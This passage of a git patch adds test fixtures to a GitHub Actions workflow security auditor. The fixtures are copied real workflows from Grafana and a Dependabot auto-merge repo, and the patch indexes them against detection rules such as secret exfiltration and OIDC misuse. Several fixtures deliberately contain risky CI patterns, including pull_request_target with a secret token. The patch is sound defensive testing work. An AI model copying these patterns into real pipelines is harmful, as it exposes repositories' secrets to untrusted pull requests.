':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-packed-packages: + needs: detect-changes + permissions: + contents: read + id-token: write + if: github.event_name == 'pull_request' && needs.detect-changes.outputs.changed-frontend-packages == 'true' + name: Verify packed frontend packages + runs-on: ubuntu-latest + steps: + - name: Checkout build commit + uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Build and pack packages + run: | + yarn run packages:build + yarn run packages:pack + - name: Validate packages + run: ./scripts/validate-npm-packages.sh + lint-circular-dependencies: + needs: detect-changes + permissions: + contents: read + id-token: write + if: github.event_name == 'pull_request' && needs.detect-changes.outputs.changed == 'true' + name: Check circular dependencies + runs-on: ubuntu-x64-small + steps: + - name: Checkout build commit + uses: actions/checkout@v5 + with: + persist-credentials: false + path: "./pr" + - name: Setup Node + uses: ./pr/.github/actions/setup-node + with: + cwd: "./pr" + - name: Install yarn dependencies + uses: ./pr/.github/actions/yarn-install + with: + cwd: "./pr" + - name: Check circular dependencies on PR + # the first sed command is used to clean the output + working-directory: ./pr + run: | + yarn lint:circular &> /tmp/pr-circular.txt || true + sed -n '/.*Found \([0-9]*\) circular.*/,$p' /tmp/pr-circular.txt > /tmp/pr-circular-clean.txt + echo "Circular dependencies on PR:" + pr_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/pr-circular-clean.txt) + echo "$pr_count" + - name: Checkout main branch + uses: actions/checkout@v5 + with: + persist-credentials: false + repository: "grafana/grafana" + ref: "main" + path: "./main" + - name: Setup Node + uses: ./pr/.github/actions/setup-node # run the action from the PR, pointing to the base checkout + with: + cwd: "./main" + - name: Install yarn dependencies + uses: ./pr/.github/actions/yarn-install # run the action from the PR, pointing to the base checkout + with: + cwd: "./main" + - name: Check circular dependencies on main + working-directory: ./main + # the first sed command is used to clean the output + run: | + yarn lint:circular &> /tmp/main-circular.txt || true + sed -n '/.*Found \([0-9]*\) circular.*/,$p' /tmp/main-circular.txt > /tmp/main-circular-clean.txt + echo "Circular dependencies on main:" + main_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/main-circular-clean.txt) + echo "$main_count" + - name: Compare circular dependencies + run: | + main_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/main-circular-clean.txt) + pr_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/pr-circular-clean.txt) + echo "Main branch circular dependencies: $main_count lines" + echo "PR branch circular dependencies: $pr_count lines" + if [ "$pr_count" -gt "$main_count" ]; then + echo "🚨 ERROR: PR introduces new circular dependencies!" + echo "Diff between main and PR:" + diff -u /tmp/main-circular-clean.txt /tmp/pr-circular-clean.txt || true + exit 1 + fi + + yarn-install-validation: + needs: + - detect-changes + if: needs.detect-changes.outputs.changed-frontend-dependencies == 'true' + runs-on: ubuntu-x64-small + name: Validate yarn install + permissions: + contents: read + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + + # Deliberately not using the yarn-install action for exact control over the command for extra checks + - name: Install yarn dependencies + run: yarn install --immutable --check-cache + env: + YARN_ENABLE_HARDENED_MODE: 1 diff --git a/test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml b/test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml new file mode 100644 index 0000000..60b38d1 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml @@ -0,0 +1,13 @@ +name: dependabot-auto-merge + +on: [pull_request_target] + +jobs: + auto-merge: + if: ${{ github.actor == 'dependabot[bot]' }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: ahmadnassri/action-dependabot-auto-merge@v2.3.1 + with: + github-token: ${{ secrets.DEPENDABOT_AUTO_MERGE_TOKEN }} diff --git a/test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml b/test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml new file mode 100644 index 0000000..d307705 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml @@ -0,0 +1,329 @@ +name: Lint Frontend +on: + pull_request: + push: + branches: + - main + - release-*.*.* + +permissions: {} + +jobs: + detect-changes: + name: Detect whether code changed + runs-on: ubuntu-latest + permissions: + contents: read + outputs: + changed: ${{ steps.detect-changes.outputs.frontend }} + prettier: ${{ steps.detect-changes.outputs.frontend == 'true' || steps.detect-changes.outputs.docs == 'true' }} + changed-frontend-packages: ${{ steps.detect-changes.outputs.frontend-packages }} + changed-frontend-dependencies: ${{ steps.detect-changes.outputs.frontend-dependencies }} + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: true # required to get more history in the changed-files action + fetch-depth: 2 + - name: Detect changes + id: detect-changes + uses: ./.github/actions/change-detection + with: + self: .github/workflows/frontend-lint.yml + + lint-frontend-prettier: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-prettier-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true && needs.detect-changes.outputs.prettier == 'true' + name: Lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run prettier:check + - run: yarn run lint + lint-frontend-prettier-enterprise: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false && needs.detect-changes.outputs.prettier == 'true' + name: Lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run prettier:check + - run: yarn run lint + lint-frontend-typecheck: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-typecheck-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true && needs.detect-changes.outputs.changed == 'true' + name: Typecheck + runs-on: ubuntu-latest + env: + NODE_OPTIONS: --max-old-space-size=8192 + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run typecheck + lint-frontend-typecheck-enterprise: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false && needs.detect-changes.outputs.changed == 'true' + name: Typecheck + runs-on: ubuntu-latest + env: + NODE_OPTIONS: --max-old-space-size=8192 + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run typecheck + lint-frontend-api-clients: + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, + # the `lint-frontend-api-clients-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true + name: Verify API clients + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Generate API clients + run: | + extract_error_message='ERROR! API client generation failed!' + yarn generate-apis || (echo "${extract_error_message}" && false) + - name: Verify generated clients + run: | + uncommited_error_message="ERROR! API client generation has not been committed. Please run 'yarn generate-apis', commit the changes and push again." + file_diff="$(git diff ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-openapi: + # Run this workflow for OSS only + permissions: + contents: read + id-token: write + name: Verify OpenAPI specs + runs-on: ubuntu-x64-large + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Free up disk space + run: | + sudo rm -rf /usr/local/lib/android || true + sudo rm -rf /usr/share/dotnet || true + sudo rm -rf /opt/ghc || true + sudo rm -rf /usr/local/.ghcup || true + - name: Generate OpenAPI specs + run: | + extract_error_message='ERROR! OpenAPI generation failed!' + yarn generate:openapi || (echo "${extract_error_message}" && false) + - name: Verify generated specs + run: | + git add -N . + uncommited_error_message="ERROR! OpenAPI generation has not been committed. Please run 'yarn generate:openapi', commit the changes and push again." + file_diff="$(git diff --name-only ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-api-clients-enterprise: + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false + name: Verify API clients (enterprise) + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Setup Enterprise + uses: ./.github/actions/setup-enterprise + with: + github-app-name: "grafana-ci-bot" + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Generate API clients + run: | + extract_error_message='ERROR! API client generation failed!' + yarn generate-apis || (echo "${extract_error_message}" && false) + - name: Verify generated clients + run: | + uncommited_error_message="ERROR! API client generation has not been committed. Please run 'yarn generate-apis', commit the changes and push again." + file_diff="$(git diff ':!conf')" + if [ -n "$file_diff" ]; then + echo "$file_diff" + echo "${uncommited_error_message}" + exit 1 + fi + lint-frontend-packed-packages: + needs: detect-changes + permissions: + contents: read + id-token: write + if: github.event_name == 'pull_request' && needs.detect-changes.outputs.changed-frontend-packages == 'true' + name: Verify packed frontend packages + runs-on: ubuntu-latest + steps: + - name: Checkout build commit + uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - name: Build and pack packages + run: | + yarn run packages:build + yarn run packages:pack + - name: Validate packages + run: ./scripts/validate-npm-packages.sh + lint-circular-dependencies: + needs: detect-changes + permissions: + contents: read + id-token: write + if: github.event_name == 'pull_request' && needs.detect-changes.outputs.changed == 'true' + name: Check circular dependencies + runs-on: ubuntu-x64-small + steps: + - name: Checkout build commit + uses: actions/checkout@v5 + with: + persist-credentials: false + path: "./pr" + - name: Setup Node + uses: ./pr/.github/actions/setup-node + with: + cwd: "./pr" + - name: Install yarn dependencies + uses: ./pr/.github/actions/yarn-install + with: + cwd: "./pr" + - name: Check circular dependencies on PR + # the first sed command is used to clean the output + working-directory: ./pr + run: | + yarn lint:circular &> /tmp/pr-circular.txt || true + sed -n '/.*Found \([0-9]*\) circular.*/,$p' /tmp/pr-circular.txt > /tmp/pr-circular-clean.txt + echo "Circular dependencies on PR:" + pr_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/pr-circular-clean.txt) + echo "$pr_count" + - name: Checkout main branch + uses: actions/checkout@v5 + with: + persist-credentials: false + repository: "grafana/grafana" + ref: "main" + path: "./main" + - name: Setup Node + uses: ./pr/.github/actions/setup-node # run the action from the PR, pointing to the base checkout + with: + cwd: "./main" + - name: Install yarn dependencies + uses: ./pr/.github/actions/yarn-install # run the action from the PR, pointing to the base checkout + with: + cwd: "./main" + - name: Check circular dependencies on main + working-directory: ./main + # the first sed command is used to clean the output + run: | + yarn lint:circular &> /tmp/main-circular.txt || true + sed -n '/.*Found \([0-9]*\) circular.*/,$p' /tmp/main-circular.txt > /tmp/main-circular-clean.txt + echo "Circular dependencies on main:" + main_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/main-circular-clean.txt) + echo "$main_count" + - name: Compare circular dependencies + run: | + main_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/main-circular-clean.txt) + pr_count=$(sed -n 's/.*Found \([0-9]*\) circular.*/\1/p' /tmp/pr-circular-clean.txt) + echo "Main branch circular dependencies: $main_count lines" + echo "PR branch circular dependencies: $pr_count lines" + if [ "$pr_count" -gt "$main_count" ]; then + echo "🚨 ERROR: PR introduces new circular dependencies!" + echo "Diff between main and PR:" + diff -u /tmp/main-circular-clean.txt /tmp/pr-circular-clean.txt || true + exit 1 + fi + + yarn-install-validation: + needs: + - detect-changes + if: needs.detect-changes.outputs.changed-frontend-dependencies == 'true' + runs-on: ubuntu-x64-small + name: Validate yarn install + permissions: + contents: read + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + + # Deliberately not using the yarn-install action for exact control over the command for extra checks + - name: Install yarn dependencies + run: yarn install --immutable --check-cache + env: + YARN_ENABLE_HARDENED_MODE: 1 diff --git a/test-fixtures/workflow-audits/real-cases/index.json b/test-fixtures/workflow-audits/real-cases/index.json index 2db2c98..8761126 100644 --- a/test-fixtures/workflow-audits/real-cases/index.json +++ b/test-fixtures/workflow-audits/real-cases/index.json @@ -22,5 +22,47 @@ "target": "RC-04-dependabot-execution", "expected_rule": "dependabot-execution", "source": "https://github.com/RoleModel/rolemodel_rails/blob/83f8c13518afd1137405b81fc4723e202f833368/lib/generators/rolemodel/github/templates/dependabot.yml" + }, + { + "id": "RC-05-workflow-pr-target-checkout-head", + "target": "RC-05-workflow-pr-target-checkout-head", + "expected_rule": "workflow-pr-target-checkout-head", + "source": "https://github.com/antiwork/gumroad/blob/000969060793173ff7501038e4104794a5f842b1/.github/workflows/tests.yml" + }, + { + "id": "RC-06-workflow-artifact-trust-chain", + "target": "RC-06-workflow-artifact-trust-chain", + "expected_rule": "workflow-artifact-trust-chain", + "source": "https://github.com/facebook/react/blob/3e1abcc8d7083a13adf4774feb0d67ecbe4a2bc4/.github/workflows/runtime_build_and_test.yml" + }, + { + "id": "RC-07-workflow-call-boundary", + "target": "RC-07-workflow-call-boundary", + "expected_rule": "workflow-call-boundary", + "source": "https://github.com/valkey-io/valkey/blob/543a6b83dffff9d35da046ad2067a94b60cf3f38/.github/workflows/daily.yml" + }, + { + "id": "RC-08-workflow-secret-exfiltration", + "target": "RC-08-workflow-secret-exfiltration", + "expected_rule": "workflow-secret-exfiltration", + "source": "https://github.com/r-dbi/odbc/blob/02f4a32cacde3b24168cf4d28a18279e22c4939f/.github/workflows/db-pro.yaml" + }, + { + "id": "RC-09-workflow-oidc-untrusted-context", + "target": "RC-09-workflow-oidc-untrusted-context", + "expected_rule": "workflow-oidc-untrusted-context", + "source": "https://github.com/grafana/grafana/blob/2131a63ca06a161abcc1f46ff0352ca2ce3b06ca/.github/workflows/frontend-lint.yml" + }, + { + "id": "RC-10-dependabot-auto-merge", + "target": "RC-10-dependabot-auto-merge", + "expected_rule": "dependabot-auto-merge", + "source": "https://github.com/bflad/go-module-two/blob/b34d6ff790df1dec533198da4be2f9857199d725/.github/workflows/dependabot-auto-merge.yml" + }, + { + "id": "RC-11-workflow-local-action-mutation", + "target": "RC-11-workflow-local-action-mutation", + "expected_rule": "workflow-local-action-mutation", + "source": "https://github.com/grafana/grafana/blob/2131a63ca06a161abcc1f46ff0352ca2ce3b06ca/.github/workflows/frontend-lint.yml" } ] From 08928dd389ed1ed5e5869cc665373d94f81a5de4 Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 15:10:40 +0000 Subject: [PATCH 6/6] test(workflow): split real-case checks into per-fixture tests --- tests/layer2/workflow-real-cases.test.ts | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tests/layer2/workflow-real-cases.test.ts b/tests/layer2/workflow-real-cases.test.ts index df2f23f..8529509 100644 --- a/tests/layer2/workflow-real-cases.test.ts +++ b/tests/layer2/workflow-real-cases.test.ts @@ -43,8 +43,8 @@ function loadRealCaseIndex(): RealCaseEntry[] { } describe("workflow real-case fixtures", () => { - it("detects expected findings on commit-pinned public workflow fixtures", async () => { - for (const fixture of loadRealCaseIndex()) { + for (const fixture of loadRealCaseIndex()) { + it(`${fixture.id} detects ${fixture.expected_rule} on commit-pinned fixture`, async () => { const targetPath = resolve( process.cwd(), "test-fixtures/workflow-audits/real-cases", @@ -62,6 +62,6 @@ describe("workflow real-case fixtures", () => { `${fixture.id} should detect ${fixture.expected_rule}`, ).toBe(true); expect(fixture.source.startsWith("https://github.com/")).toBe(true); - } - }); + }, 20_000); + } });